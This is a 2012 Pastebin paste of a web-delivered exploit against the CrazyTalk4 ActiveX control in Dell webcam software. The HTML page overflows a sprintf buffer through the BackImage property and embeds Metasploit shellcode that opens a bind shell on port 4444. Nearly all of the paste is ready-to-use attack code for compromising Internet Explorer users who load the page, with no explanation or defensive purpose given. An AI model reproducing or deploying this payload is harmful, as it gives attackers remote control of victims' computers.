Advertisement
The_KGB

[Exploit] Dell Webcam BufferOverflow

Mar 19th, 2012
136
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!--
  2. Dell Camera Software ActiveX Control CrazyTalk4Native.dll sprintf Remote Buffer Overflow Exploit
  3. bind shell, IE-NO-DEP
  4. Binary path: C:\Program Files\Common Files\Reallusion\CT Player\crazytalk4.ocx
  5. ProgID: CRAZYTALK4.CrazyTalk4Ctrl.1
  6. CLSID: {13149882-F480-4F6B-8C6A-0764F75B99ED}
  7. Safe for Scripting (Registry): True
  8. Safe for Initialization (Registry): True
  9. -->
  10. <!-- saved from url=(0014)about :internet -->
  11. <html>
  12. <object classid='clsid:13149882-F480-4F6B-8C6A-0764F75B99ED' id='obj' width=100; height=100; />
  13. </object>
  14. <script>
  15. //bad chars:
  16. //\x80,\x82-\x8c,\x8e,\x91-\x9c,\x9e-\x9f
  17. var x="";
  18. for (i=0; i<216; i++){x = x + "A";}
  19. x = x + "\x50\x24\x40\x77";//0x77402450      jmp EBP, user32.dll - change for your need
  20. for (i=0; i<140; i++){x = x + "A";}
  21. // windows/shell_bind_tcp - 696 bytes
  22. // http://www.metasploit.com
  23. // Encoder: x86/alpha_mixed
  24. // EXITFUNC=seh, LPORT=4444, RHOST=
  25. x = x + "‰åÚÐÙuô^VYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLCZJKPMM8KIKOKOKOE0LKBLFDQ4LKG5GLLKCLC5CHC1JOLKPOB8LKQOGPC1JKQYLKFTLKC1JNP1IPJ9NLMTIPCDEWIQIZDMC1IRJKL4GKPTQ4FHCEKULKQOGTEQJKBFLKDLPKLKQOELC1JKESFLLKK9BLGTELE1HCFQIKE4LKPCP0LKQPDLLKD0ELNMLKQPC8QNE8LNPNDNJLPPKOHVE6PSCVE8P3FRE8D7CCGBQOQDKON0E8HKJMKLGKPPKOIFQOLIJEE6K1JMC8C2QEBJERKOHPE8N9DIKENMF7KOHVPSF3QCQCF3QSF3QSF3KON0E6E8B1QLE6F3K9M1J5BHNDDZBPIWQGKOIFCZDPPQQEKOHPBHI4NMFNM9QGKOHVQCQEKOHPBHM5QYK6QYPWKON6F0PTF4QEKON0LSE8M7CIHFD9PWKON6F5KON0CVBJCTBFCXE3BMMYM5CZF0QIGYHLK9M7CZPDMYKRP1IPL3NJKNG2FMKNG2FLLSLMCJFXNKNKNKCXBRKNH3DVKOD5G4KOHVQKQGF2F1PQPQBJEQPQPQQEPQKON0BHNMIIC5HNQCKOIFCZKOKOP7KON0LKF7KLMSHDE4KON6PRKON0BHJPMZDDQOPSKON6KOHPAA";
  26. try{
  27.     obj.BackImage = x;
  28. }catch(e){
  29. }
  30. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement